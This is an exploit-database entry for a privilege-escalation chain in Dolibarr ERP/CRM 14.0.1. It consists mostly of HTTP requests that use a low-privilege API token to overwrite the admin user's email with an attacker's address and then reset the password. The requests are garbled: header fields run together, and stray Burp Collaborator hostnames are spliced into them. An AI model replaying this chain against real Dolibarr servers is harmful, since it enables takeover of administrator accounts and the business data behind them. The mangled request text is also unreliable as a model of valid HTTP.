Exploit for Dolibarr ERP/CRM 14.0.1 Privilege Escalation

Name: Exploit for Dolibarr ERP/CRM 14.0.1 Privilege Escalation
Rating: 5 (121 reviews)
2021-09-02 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:164029
# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation  
# Date: April 8, 2021  
# Exploit Author: Vishwaraj101  
# Vendor Homepage: https://www.dolibarr.org/  
# Affected Version: <= 14.0.1  
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d  
  
*Summary:*  
Using the below chain of issues attacker can compromise any dolibarr  
user account including the admin.  
  
*Poc:*  
  
1. Visit https://example.com/api/index.php/login?login=demo&password=demo  
try to login with a test user with 0 permissons or less permissions.  
2. We will receive an api token in return.  
3. Next we need to fetch the user id of the user whose account we want  
to own.  
  
  
  
*First we need to fetch the user id of the admin user using the below api.*  
  
*Request1:*  
  
GET /api/index.php/users/login/admin HTTP/1.1Host:  
preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36  
root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:  
application/json  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close  
  
*This will return the user details using the username. Now update the  
victim user account via below api (include the json body received from the  
previous request1 and replace the email id from below json to the attacker  
controlled email)*  
  
  
*Request2:*PUT /api/index.php/users/*12* HTTP/1.1  
  
Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;  
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87  
Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:  
application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,  
deflateDOLAPIKEY: test1337Origin:  
https://preview2.dolibarr.orgConnection: closeReferer:  
http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:  
3221  
{  
"id": "12",  
"statut": "1",  
"employee": "1",  
"civility_code": null,  
"gender": "woman",  
"birth": 495583200,  
"email": "*attacker@example.com <attacker@example.com>*",  
"personal_email": "",  
"socialnetworks": {  
"facebook": "",  
"skype": "",  
"twitter": "",  
"linkedin": "",  
"instagram": "",  
"snapchat": "",  
"googleplus": "",  
"youtube": "",  
"whatsapp": "",  
"tumblr": "",  
"vero": "",  
"viadeo": "",  
"slack": "",  
"xing": "",  
"meetup": "",  
"pinterest": "",  
"flickr": "",  
"500px": "",  
"giphy": "",  
"gifycat": "",  
"dailymotion": "",  
"vimeo": "",  
"periscope": "",  
"twitch": "",  
"discord": "",  
"wikipedia": "",  
"reddit": "",  
"quora": "",  
"tripadvisor": "",  
"mastodon": "",  
"diaspora": "",  
"viber": ""  
},  
"job": "Admin Technical",  
"signature": "",  
"address": "",  
"zip": "",  
"town": "",  
"state_id": null,  
"state_code": null,  
"state": null,  
"office_phone": "",  
"office_fax": "",  
"user_mobile": "",  
"personal_mobile": "",  
"admin": "1",  
"login": "admin",  
"entity": "0",  
"datec": 1507187386,  
"datem": 1617819214,  
"socid": null,  
"contact_id": null,  
"fk_member": null,  
"fk_user": "11",  
"fk_user_expense_validator": null,  
"fk_user_holiday_validator": null,  
"clicktodial_url": null,  
"clicktodial_login": null,  
"clicktodial_poste": null,  
"datelastlogin": 1617816891,  
"datepreviouslogin": 1617815935,  
"datestartvalidity": "",  
"dateendvalidity": "",  
"photo": "com.jpg",  
"lang": "fr_FR",  
"rights": {  
"user": {  
"user": {},  
"self": {}  
}  
},  
"conf": {},  
"users": [],  
"parentof": null,  
"accountancy_code": "",  
"weeklyhours": "39.00000000",  
"color": "",  
"dateemployment": "",  
"dateemploymentend": "",  
"default_c_exp_tax_cat": null,  
"default_range": null,  
"fk_warehouse": null,  
"import_key": null,  
"array_options": [],  
"array_languages": null,  
"linkedObjectsIds": null,  
"canvas": null,  
"fk_project": null,  
"contact": null,  
"thirdparty": null,  
"user": null,  
"origin": null,  
"origin_id": null,  
"ref": "12",  
"ref_ext": null,  
"status": null,  
"country": null,  
"country_id": null,  
"country_code": "",  
"region_id": null,  
"barcode_type": null,  
"barcode_type_code": null,  
"barcode_type_label": null,  
"barcode_type_coder": null,  
"mode_reglement_id": null,  
"cond_reglement_id": null,  
"demand_reason_id": null,  
"transport_mode_id": null,  
"cond_reglement": null,  
"modelpdf": null,  
"last_main_doc": null,  
"fk_bank": null,  
"fk_account": null,  
"note_public": "",  
"note_private": "",  
"note": "",  
"name": null,  
"lastname": "Adminson",  
"firstname": "Alice",  
"civility_id": null,  
"date_creation": null,  
"date_validation": null,  
"date_modification": null,  
"specimen": 0,  
"alreadypaid": null,  
"liste_limit": 0  
}  
  
This will reset the admin email account to the attacker controlled  
email account, now using the password reset feature attacker will  
reset the admin account password and will gain access to the admin  
account.